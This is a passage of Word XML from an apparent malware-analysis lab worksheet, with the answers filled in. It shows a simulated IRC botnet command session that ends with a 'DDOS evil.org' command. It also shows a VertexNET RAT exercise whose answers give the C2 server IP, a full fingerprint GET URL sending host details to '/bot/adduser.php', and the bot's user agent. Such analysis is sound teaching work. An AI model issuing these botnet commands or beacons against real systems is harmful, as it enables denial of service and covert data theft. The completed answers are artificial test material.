          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Connected to 172.16.220.130.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78120A99" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D9A62" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NOTICE AUTH :*** Welcome to irc.inetsim.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B88A181" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NOTICE AUTH :*** Looking up your hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8AE07" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NOTICE AUTH :*** Checking Ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1929060E" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NOTICE AUTH :*** No ident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA13D0" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NOTICE AUTH :*** Found your hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1817FD18" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00DE03BC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specify a nickname using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>NICK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5534BE" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00DE03BC">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:keepNext/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NICK botmaster </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED5519D" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00DE03BC">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PING :irc.inetsim.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2745D" w14:textId="536AFD8C" w:rsidR="005927A0" w:rsidRDefault="00A63D66" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve">pecify user information </w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E55ADA" w14:textId="4C27355A" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="-90"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USER botmaster </w:t>
      </w:r>
      <w:r w:rsidR="006E6971">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>masteroftheuniverse</w:t>
      </w:r>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.16.220.130 :Vlad </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADB5933" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="-90"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:irc.inetsim.org 001 botmaster :Welcome to the Internet Relay Network botmaster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF9EB0B" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="-90"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:irc.inetsim.org 002 botmaster :Your host is irc.inetsim.org, running INetSim IRC Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBAE607" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="-90"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:irc.inetsim.org 003 botmaster :This server was created Oct 04 2009 at 02:47:07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16177D00" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="-90"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:irc.inetsim.org 004 botmaster :irc.inetsim.org INetSim IRC Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAD93F" w14:textId="6F9C28BA" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This specifies a nickname, alternative nickname, server address and a real name. (). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE8025" w14:textId="0E589533" w:rsidR="005927A0" w:rsidRDefault="007A2182" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002E0A4F">
        <w:t>pecify a mode for this user</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D1B11B" w14:textId="0A874B1C" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="002E0A4F" w:rsidP="002E0A4F">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MODE botmaster +i </w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:botmaster!botmaster@172.16.220.1 MODE :botmaster +i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59215B" w14:textId="5B16EE36" w:rsidR="005927A0" w:rsidRDefault="00DE03BC" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve">oin a channel (this </w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> often only accessible to the bot master in q</w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t>uestion) using the JOIN command</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571D68A" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN #bots </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B404D04" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:botmaster2!botmaster2@172.16.220.1 JOIN :#bots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD766F9" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E963419" w14:textId="7E8D3AAF" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, send messages to this channel using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>PRIVMSG</w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="00DE03BC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA3B2D1" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="-90"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005927A0">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PRIVMSG #bots :DDOS evil.org </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C9004" w14:textId="3291D7A9" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that </w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t>you’ve seen a little of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> how some of these plain text protocols work, </w:t>
      </w:r>
      <w:r w:rsidR="007A2182">
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can analyze a sample that use</w:t>
      </w:r>
      <w:r w:rsidR="00C63A58">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the HTTP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FCC189" w14:textId="104246D8" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc16"/>
      <w:bookmarkStart w:id="12" w:name="_Toc472375409"/>
      <w:bookmarkStart w:id="13" w:name="_Toc24514477"/>
      <w:r>
        <w:t xml:space="preserve">Analyzing VertexNET RAT Fingerprinting </w:t>
      </w:r>
      <w:r w:rsidR="00ED273E">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:t>C2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1599922B" w14:textId="7177AAD3" w:rsidR="005927A0" w:rsidRDefault="00ED273E" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t>VertexNET</w:t>
      </w:r>
      <w:r w:rsidR="003138FE">
        <w:t>, it</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> fingerprint</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> the current machine and provide</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve"> this information over a command and control medium to a command and control server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F893697" w14:textId="6A3E2A38" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Begin a new Wireshark packet capture by clicking the </w:t>
      </w:r>
      <w:r w:rsidR="00ED273E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D581661" wp14:editId="32901082">
            <wp:extent cx="225188" cy="224828"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="23"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16-12-31 at 12.52.32 PM.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="45155" t="13845" r="40105" b="46269"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="232381" cy="232009"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>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ED273E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>Restart the running live capture</w:t>
      </w:r>
      <w:r w:rsidR="00ED273E">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED273E">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CAB0B1" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Run the provided VertexNET RAT sample.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FA522" w14:textId="77777777" w:rsidR="00ED273E" w:rsidRDefault="00ED273E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE94A26" w14:textId="251B23F8" w:rsidR="005927A0" w:rsidRDefault="00ED273E" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED273E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE5119" w14:textId="0BBB2FAF" w:rsidR="005927A0" w:rsidRPr="00ED273E" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED273E">
        <w:t>What IP address is being contacted by the HTTP C2 request?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB78C5B" w14:textId="7A1843B4" w:rsidR="00E3721C" w:rsidRPr="00B63FB0" w:rsidRDefault="00B63FB0" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>103.58.149.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72906063" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="4F126127" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="47BB851C" w14:textId="6F0AB590" w:rsidR="005927A0" w:rsidRPr="00ED273E" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED273E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What parameters are being emitted within the fingerprint GET requests?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25ECFD" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="3D0154E4" w14:textId="62B6D21B" w:rsidR="00E3721C" w:rsidRPr="00B63FB0" w:rsidRDefault="00B63FB0" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://103.58.149.128/bot/adduser.php?uid={846ee340-7039-11de-9d20-806e6f6e6963--1726988349}&amp;lan=192.168.118.128&amp;cmpname=WIN-QJSCPAI220D%20[SAIT_ITSC303]&amp;country=English%20(United%20States)%20+1&amp;cc=US&amp;idle=0&amp;ver=v1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77228465" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="023E012B" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="1FBF8672" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="11958342" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="1D4B8065" w14:textId="3B2FF503" w:rsidR="005927A0" w:rsidRPr="00ED273E" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED273E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What user agent is being emitted in the fingerprint GET request?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD93C2A" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="3BE5F225" w14:textId="71CC4455" w:rsidR="00E3721C" w:rsidRPr="00B63FB0" w:rsidRDefault="00B63FB0" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Agent: V32\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F875BF1" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="06DF18FA" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="6F7DDA24" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="389119D6" w14:textId="77777777" w:rsidR="009E7A35" w:rsidRPr="00ED273E" w:rsidRDefault="009E7A35" w:rsidP="00ED273E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2248CD74" w14:textId="31A0B237" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
        <w:numPr>
